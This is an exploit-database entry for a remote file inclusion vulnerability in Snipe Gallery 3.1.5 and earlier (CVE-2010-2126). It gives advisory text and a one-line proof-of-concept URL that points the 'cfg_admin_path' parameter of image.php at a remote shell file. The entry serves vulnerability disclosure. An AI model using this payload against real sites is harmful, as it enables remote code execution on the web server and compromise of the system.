Snipe Gallery 3.1 - 'image.php?cfg_admin_path' Remote File Inclusion
Author: Sn!pEr.S!Te Hacker
type: webapps
platform: php
port:
date_added: 2010-05-20
date_updated: 2014-07-09
verified: 1
codes: CVE-2010-2126;OSVDB-65069
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/40279/info
Snipe Gallery is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
The issues affect Snipe Gallery versions 3.1.5 and prior.
http://www.example.com/image.php?cfg_admin_path=[shell.txt ]